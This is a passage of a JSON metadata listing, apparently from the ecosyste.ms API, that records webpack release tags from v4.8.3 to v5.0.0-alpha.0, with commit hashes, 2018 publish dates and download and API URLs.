ebpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/h